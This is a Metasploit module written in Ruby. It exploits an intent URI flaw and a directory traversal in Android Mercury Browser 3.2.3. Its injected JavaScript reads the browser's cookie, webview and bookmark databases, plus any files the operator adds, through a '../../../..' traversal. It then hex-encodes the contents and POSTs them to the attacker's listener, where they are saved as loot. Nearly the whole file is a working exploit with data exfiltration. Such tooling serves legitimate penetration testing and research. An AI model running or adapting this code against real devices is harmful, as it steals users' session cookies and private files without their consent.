##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
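class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Auxiliary::Report

  # Module metadata plus the one extra datastore option (ADDITIONAL_FILES).
  #
  # @param info [Hash] module info merged by update_info
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Android Mercury Browser Intent URI Scheme and Directory Traversal Vulnerability',
      'Description' => %q{
        This module exploits an unsafe intent URI scheme and directory traversal found in
        Android Mercury Browser version 3.2.3. The intent allows the attacker to invoke a
        private wifi manager activity, which starts a web server for Mercury on port 8888.
        The webserver also suffers a directory traversal that allows remote access to
        sensitive files.

        By default, this module will go after webviewCookiesChromium.db, webviewCookiesChromiumPrivate.db,
        webview.db, and bookmarks.db. But if this isn't enough, you can also specify the
        ADDITIONAL_FILES datastore option to collect more files.
      },
      'Author' =>
        [
          'rotlogix', # Vuln discovery, PoC, etc
          'sinn3r',
          'joev'
        ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          [ 'URL', 'http://rotlogix.com/2015/08/23/exploiting-the-mercury-browser-for-android/' ],
          [ 'URL', 'http://versprite.com/og/multiple-vulnerabilities-in-mercury-browser-for-android-version-3-0-0/' ]
        ]
    ))

    register_options(
      [
        OptString.new('ADDITIONAL_FILES', [false, 'Additional files to steal from the device'])
      ])
  end

  # Whether the User-Agent header value claims to be an Android client.
  #
  # @param user_agent [String, nil] raw header value; nil when the client sent no User-Agent
  # @return [Boolean]
  def is_android?(user_agent)
    # to_s guards the missing-header case: nil.include? would raise NoMethodError
    # and abort on_request_uri for that connection.
    user_agent.to_s.include?('Android')
  end

  # Landing page served to Android clients. The first intent: URI launches Mercury's
  # WFMActivity2 (the wifi-manager activity named in the description); 500 ms later
  # a second intent loads the base64-encoded uxss script via SimpleWebViewActivity.
  #
  # @return [String] HTML document
  def get_html
    %Q|
    <html>
    <head>
    <meta charset="utf-8" />
    </head>
    <body>
    <script>
    location.href="intent:#Intent;SEL;component=com.ilegendsoft.mercury/.external.wfm.ui.WFMActivity2;action=android.intent.action.VIEW;end";
    setTimeout(function() {
      location.href="intent:#Intent;S.load=javascript:eval(atob('#{Rex::Text.encode_base64(uxss)}'));SEL;component=com.ilegendsoft.mercury/com.ilegendsoft.social.common.SimpleWebViewActivity;end";
    }, 500);
    </script>
    </body>
    </html>
    |
  end

  # URL the injected script POSTs collected file contents back to, derived from the
  # listener's SSL/SRVHOST/SRVPORT settings and the module resource path.
  #
  # @return [String] "<proto>://<host>[:port]<resource>/catch"
  def backend_url
    proto = datastore['SSL'] ? 'https' : 'http'
    # When bound to every interface, advertise an address the target can actually reach.
    my_host = datastore['SRVHOST'] == '0.0.0.0' ? Rex::Socket.source_address : datastore['SRVHOST']
    port_str = datastore['SRVPORT'].to_i == 80 ? '' : ":#{datastore['SRVPORT']}"
    # Drop a single trailing slash so the "/catch" suffix joins cleanly.
    resource = get_resource.chomp('/')

    "#{proto}://#{my_host}#{port_str}#{resource}/catch"
  end

  # Script run inside the Mercury webview. It opens the local Mercury server
  # (localhost:8888) in a new window and, from that origin, fetches each path in
  # file_urls through the /dodownload traversal, hex-encodes the bytes and POSTs
  # them to backend_url/<basename of the path>.
  #
  # @return [String] JavaScript source
  def uxss
    %Q|
    function exploit() {
      history.replaceState({},{},'/storage/emulated/0/Download/');
      var urls = #{JSON.generate(file_urls)};
      urls.forEach(function(url) {
        var x = new XMLHttpRequest();
        x.open('GET', '/dodownload?fname=../../../..'+url);
        x.responseType = 'arraybuffer';
        x.send();
        x.onload = function(){
          var buff = new Uint8Array(x.response);
          var hex = Array.prototype.map.call(buff, function(d) {
            var c = d.toString(16);
            return (c.length < 2) ? 0+c : c;
          }).join('');
          var send = new XMLHttpRequest();
          send.open('POST', '#{backend_url}/'+encodeURIComponent(url.replace(/.*\\//,'')));
          send.setRequestHeader('Content-type', 'text/plain');
          send.send(hex);
        };
      });
    }

    var q = window.open('http://localhost:8888/','x');
    q.onload = function(){ q.eval('('+exploit.toString()+')()'); };
    |
  end

  # Absolute device paths to retrieve: the four default Mercury databases plus any
  # whitespace-separated entries from ADDITIONAL_FILES.
  #
  # @return [Array<String>]
  def file_urls
    files = [
      '/data/data/com.ilegendsoft.mercury/databases/webviewCookiesChromium.db',
      '/data/data/com.ilegendsoft.mercury/databases/webviewCookiesChromiumPrivate.db',
      '/data/data/com.ilegendsoft.mercury/databases/webview.db',
      '/data/data/com.ilegendsoft.mercury/databases/bookmarks.db'
    ]

    extra = datastore['ADDITIONAL_FILES']
    files.concat(extra.split) if extra

    files
  end

  # HTTP handler for the listener. Non-Android clients get a 404; a POST is treated
  # as an exfiltrated file (hex-encoded body) and stored as loot; anything else is
  # served the landing page.
  #
  # @param cli request client connection
  # @param req parsed HTTP request
  def on_request_uri(cli, req)
    print_status("Requesting: #{req.uri}")

    unless is_android?(req.headers['User-Agent'])
      print_error('Target is not Android')
      send_not_found(cli)
      return
    end

    if req.method =~ /post/i
      store_exfiltrated_file(cli, req) if req.body
      return
    end

    print_status('Sending HTML...')
    send_response_html(cli, get_html)
  end

  # Decodes a hex string into a binary string, two characters per byte.
  # An odd-length input yields a final byte from the lone nibble; a non-hex
  # pair decodes to 0 (String#to_i semantics).
  #
  # @param hex [String]
  # @return [String]
  def hex2bin(hex)
    hex.chars.each_slice(2).map { |pair| pair.join.to_i(16).chr }.join
  end

  # Entry point: start the HTTP listener (HttpServer#exploit).
  def run
    exploit
  end

  private

  # Decodes a hex-encoded POST body and saves it as loot named after the last path
  # segment of the request URI. The only gate on this path is the User-Agent check
  # in on_request_uri, so both filename and contents are client-controlled.
  #
  # @param cli request client connection (peerhost is recorded with the loot)
  # @param req parsed HTTP request with a non-nil body
  def store_exfiltrated_file(cli, req)
    # File.basename never returns nil, so fall back on an empty result instead.
    filename = File.basename(req.uri.to_s)
    filename = 'file' if filename.empty?
    data = hex2bin(req.body)
    output = store_loot(
      filename, 'text/plain', cli.peerhost, data, filename, 'Android mercury browser file'
    )
    # Report the decoded size, not the length of the hex text (which is twice as long).
    print_good("Stored #{data.bytesize} bytes to #{output}")
  end
end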